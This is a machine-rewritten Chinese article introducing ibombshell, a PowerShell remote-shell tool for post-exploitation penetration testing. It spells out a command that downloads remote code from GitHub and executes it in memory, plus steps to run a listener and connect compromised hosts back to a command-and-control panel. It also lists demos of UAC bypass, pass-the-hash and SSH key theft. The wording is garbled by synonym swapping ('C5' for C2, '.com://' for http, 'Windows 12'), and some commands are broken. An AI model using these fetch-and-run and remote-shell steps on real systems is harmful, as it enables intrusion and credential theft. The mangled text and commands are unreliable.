ibombshell：一款功能强大的动态远程Shell工具

"今日给大伙儿详细介绍的是这款全名是ibombshell的动态性远程控制Shell专用工具，该专用工具应用场景Powershell开发设计，可放前渗入运用环节充分发挥其功效。

ibombshell详细介绍

ibombshell自身是1个shell，可是它可以立即免费下载进总体目标机器设备的运行内存中，并给科学研究工作人员出示很多的渗透测试作用，这种作用是立即载入进运行内存的，后以Powershell涵数的方式出示给测试工程师，除此之外，这种作用“来到哪儿”都可以立即实行。

此外，ibombshell还出示了这种全名是Silently的一级实行方式，因此渗透测试工作人员能够实行1个ibombshell案例（全名是warrior），被侵入的服务器将会根据.com连接到1个C5操作面板，因而测试工程师就能够根据操纵warrior来建立对总体目标服务器的渗入。

专用工具规定

以便充分发挥ibombshell的详细作用，最先规定的是Powershell 5.0及左右版本号，当你用的并不是Windows，你能阅读文章这篇【稿子】来建立在随意系统软件上应用Powershell。

要是你要以Silently方式运作ibombshell，你要必须Python 3.7及其别的的某些Python库，安裝指令给出：

Cd ibombshell\ c2/

pip install -r requirements.txt

专用工具应用

ibombshell关键有二种实行方式：

第二种全名是“ibombshell everywhere”方式，你能立即在Powershell上载入ibombshell：

iex (new-objectnet.webclient).downloadstring(‘https://raw.githubusercontent.Com/ElevenPaths/ibombshell/master/console’)

随后运作免费下载出来的ibombshell控制面板：

console

二种全名是“ibombshell silently”方式，当今版本号容许人们运作ibombshell控制面板并根据C5操作面板来建立远程访问。最先你必须在Powershell中起动控制面板系统进程：

iex (new-objectnet.webclient).downloadstring(‘https://raw.githubusercontent.Com/ElevenPaths/ibombshell/master/console’)

设定好ibombshell的C5相对路径：

python3 ibombshell.py

建立1个监听器，并与warrior相接：

iBombShell>load modules/listener.py

[+]Loading module有限责任公司

[+]Module loaded!

iBombShell[modules/listener.py]>run

默认设置的监视端口号为8080，随后在服务器内以Silently方式起动控制面板，并获得到远程操作管理权限：

console-Silently -uriConsole .com://[ip or domain]:[port]

ibombshell C5体制

ibombshell操作面板的基础管理机制如图所示：

Docker

人们再也不能客户出示了专做的Docker器皿，你能应用下述指令来应用它：

sudo docker build -t ""ibombshell"" .

sudo docker run -It ibombshell

专用工具应用演试

iBombShell:PoC Warrior + Bypass UAC + Pass the hash

iBombShell:macOS

ibombshell:Extracting Private SSH Keys On Windows 12

iBombShell:PoC savefunctions

许可证书协议书

本新项目遵照GNU许可证书协议书。